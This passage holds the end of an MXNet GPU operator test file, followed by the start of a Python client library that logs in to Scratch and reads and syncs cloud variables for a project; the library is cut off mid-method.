'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
@with_seed()
@pytest.mark.serial
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
@pytest.mark.serial
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
@pytest.mark.serial
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
@pytest.mark.serial
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.copy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad)
@with_seed()
@pytest.mark.serial
def test_multi_proposal_op():
# parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% guarantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch kernels with 0 threads, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
@pytest.mark.serial
def test_kernel_error_checking():
# Tests that may throw exceptions out of worker threads would stop CI testing
# if not run in a separate process (with its own address space, for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
pytest.raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3)
@with_seed()
@pytest.mark.serial
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
exe_gpu_mix = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
if req_dict['data'] == 'write':
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
if req_dict['grid'] == 'write':
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym.bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
@with_seed()
@pytest.mark.skip(reason='skipping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517')
def test_bulking_operator_gpu():
_test_bulking(_test_bulking_in_process)
@pytest.mark.skip(reason='skipping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : seg_sizes[0],
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : seg_sizes[1],
'MXNET_EXEC_BULK_EXEC_TRAIN' : seg_sizes[2]},
time_per_iteration):
# skip test since the python version can't run it properly. Warning msg was logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
fully_bulked_time = times[(15,15,True)]
print(times_str)
# Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
# slower than both half-bulked times[0,15,True] and times[15,0,True]
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
@with_seed()
@pytest.mark.serial
def test_allclose_function_gpu():
allclose_function([mx.cpu(), mx.gpu(0)])
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_arange_like_dtype():
dtypes = [np.float16, np.float32, np.float64]
for t in dtypes:
x = mx.sym.Variable('x', dtype=t)
y = mx.sym.reshape(x, shape=(0, 0, -1))
z = mx.sym.contrib.arange_like(y, axis=-1)
mod = z.simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null')
mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t)
out = mod.forward(is_train=False)
for v in out:
assert v.dtype == t
|
code.py
|
import json
import websocket
import re
import requests
import colorama
from colorama import Fore
import threading
import time
import asyncio
import inspect
import os
import datetime
class Client:
def __init__(self, username, password, source=None):
"""
Creates a Scratch Client so you can start connecting to your projects.
Note: your username and password are not stored, either globally or locally.
:param username: Your Scratch Username
:param password: Your Scratch Password
:param source: Normally set this to __file__ so error messages can suggest the offending line
:return: None
:rtype: None
"""
colorama.init()
self.sessionId = None
self.discord_link = "https://discord.gg/tF7j7MswUS"
self.username = username
self.password = password
self.source = source
self.meta = None
self.headers = {
"x-csrftoken": "a",
"x-requested-with": "XMLHttpRequest",
"Cookie": "scratchcsrftoken=a;scratchlanguage=en;",
"referer": "https://scratch.mit.edu",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36"
}
try:
self.data = json.dumps({
"username": self.username,
"password": self.password
})
request = requests.post(
'https://scratch.mit.edu/login/', data=self.data, headers=self.headers)
self.sessionId = re.search(
'\"(.*)\"', request.headers['Set-Cookie']).group()
self.token = request.json()[0]["token"]
self.headers = {
"x-requested-with": "XMLHttpRequest",
"Cookie": "scratchlanguage=en;permissions=%7B%7D;",
"referer": "https://scratch.mit.edu",
}
self.request = requests.get(
"https://scratch.mit.edu/csrf_token/", headers=self.headers)
self.csrftoken = re.search(
"scratchcsrftoken=(.*?);", request.headers["Set-Cookie"]
).group(1)
except AttributeError as error:
if source is not None:
self.error_proxy = error
self.file = open(self.source, "r", encoding='UTF-8')
self.line = ""
self.count = 0
for i in self.file:
self.count += 1
if 'client' in i.lower():
self.line = i
break
self.message = f"{Fore.RED}[scratchon] Invalid Credentials!\n{Fore.YELLOW} Tip: Double check to make sure your username and password are correct\n {Fore.BLUE} Suggested Line:\n {Fore.WHITE} Line: {self.count} | {self.line} {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
else:
self.message = f"{Fore.RED}[scratchon] Invalid Credentials!\n{Fore.YELLOW} Tip: Double check to make sure your username and password are correct\n {Fore.BLUE} Suggested Line:\n {Fore.WHITE} Define source in Client() to get suggestions\n scratchon.Client(source=__file__, ...) {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
else:
self.message = f"{Fore.GREEN}[scratchon] Logged in as: {username}\n{Fore.RESET} You will be automatically signed out of your scratch account!"
print(self.message)
self.headers = {
"x-csrftoken": self.csrftoken,
"X-Token": self.token,
"x-requested-with": "XMLHttpRequest",
"Cookie": "scratchcsrftoken=" + self.csrftoken + ";scratchlanguage=en;scratchsessionsid=" + self.sessionId + ";",
"referer": "",
}
def manage(self, project_id: int, codec_method=None, compare="time"):
"""
This is one of the most important methods, as it allows you to connect your Scratch project to your Python code.
:param project_id: The id of the Scratch project you wish to connect to.
:param codec_method: Optional path to a codec file used by encode()/decode()
:param compare: The way to compare cloud variables ('time' or 'value')
:return: Manage instance bound to the project
:rtype: object
"""
if codec_method is not None:
self.meta = use_file_for_codec(codec_method, self.discord_link)
try:
return Manage(project_id, self.sessionId, self.username, self.discord_link, source=self.source, codec_method=self.meta, compare=compare)
except Exception:
self.message = f"{Fore.RED}[scratchon] Prior Exception\n{Fore.YELLOW} Tip: Check to see if any errors occurred prior to this message\n {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
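# Hedged usage sketch (illustrative only; the credentials and project id below are
# placeholders, not values from this module):
#
#   client = Client("my_username", "my_password", source=__file__)
#   project = client.manage(123456789, compare="value")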
class Variable:
def __init__(self, last_value, current_value, name, project_owner, project_id, origin):
"""
An object representing a Scratch cloud variable
:param last_value: Undefined
:param current_value: Undefined
:param name: Undefined
:param project_owner: Undefined
:param project_id: Undefined
:param origin: Undefined
"""
self.last_value = last_value
self.current_value = current_value
self.raw_name = name
self.name = self.raw_name.split('☁ ')[1]
self.project_owner = project_owner
self.project_id = project_id
self.object = origin
def serve_file(path):
return path
def use_file_for_codec(path, discord_link):
if os.path.isfile(path):
file = open(path)
root = {}
counter = 0
for lines in file:
counter += 1
if lines != '\n':
root[lines.replace('\n', '')] = counter
file.close()
return CreateCodecClass(root)
else:
print(f"{Fore.RED}[scratchon] File Not Served\n{Fore.YELLOW} Tip: Check to see if the file path is correct\n {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {discord_link} {Fore.RESET}")
class CreateCodecClass:
def __init__(self, root):
self.root = root
self.temp = None
self.letter = None
self.data = None
def _encode(self, data):
self.temp = ""
for letter in data:
self.temp += str(self.root[letter])
return self.temp
def _decode(self, data):
self.data = str(data)
self.temp = ""
for times in range(0, len(self.data), 2):
self.letter = self.data[times] + self.data[times + 1]
self.temp += self.get_key(int(self.letter))
return self.temp
def get_key(self, val):
for key, value in self.root.items():
if val == value:
return key
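# Hedged illustration of the codec (the mapping below is an assumed example, not a file
# shipped with this module). A served file lists one character per line, so each
# character encodes to its line number and decoding reads two digits at a time:
#
#   codec = CreateCodecClass({'a': 10, 'b': 11})
#   codec._encode('ab')    # -> '1011'
#   codec._decode('1011')  # -> 'ab'
#
# Note that line numbers below 10 would not round-trip through the two-digit decoder.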
class Manage:
def __init__(self, project_id, session_id, username, discord_link, source, codec_method, compare):
"""
An object that represents your Scratch project; not meant to be instantiated directly by the user.
:param project_id: Undefined
:param session_id: Undefined
:param username: Undefined
:param discord_link: https://discord.gg/tF7j7MswUS
:param codec_method: Undefined
"""
self.ws = websocket.WebSocket()
self.project_id, self.session_id, self.username = project_id, session_id, username
self.proxy_response = None
self.websocket_connected = True
self.proxy_calls = 0
self.discord_link = discord_link
self.var_object = None
self.stats, self.message, self.counter = None, None, 0
self.source = source
self.codec_method = codec_method
self.is_using_codec = codec_method
self.callback_directory = {}
self.event_dictionary = ['cloud_update', 'connected', 'tick']
self.responses = []
self.cloud_last_values = {}
self.cloud_last_timestamp = {}
self.compare_via = compare.lower()
self._created_at = datetime.datetime.now()
self.receive_type = None
self.ws.connect('wss://clouddata.scratch.mit.edu', cookie='scratchsessionsid=' + self.session_id + ';',
origin='https://scratch.mit.edu', enable_multithread=True)
self.proxy_response = self.ws.send(json.dumps({
'method': 'handshake',
'user': self.username,
'project_id': str(self.project_id)
}) + '\n')
def call_scratch_api():
while self.websocket_connected:
try:
self.response = requests.get("https://clouddata.scratch.mit.edu/logs?projectid=" + str(
self.project_id) + "&limit=25" + "&offset=0").json()
self.response = self.response[0]
self.var_name = self.response['name']
self.var_value = self.response['value']
self.epoch = self.response['timestamp']
self.action = self.response['verb']
self.when = datetime.datetime.fromtimestamp(self.epoch / 1000.0)
self.dif = self.when - self._created_at
self.proxy_calls += 1
if self.compare_via == "value":
if self.var_name not in self.cloud_last_values:
self.cloud_last_values[self.var_name] = self.var_value
if self.cloud_last_values[self.var_name] != self.var_value:
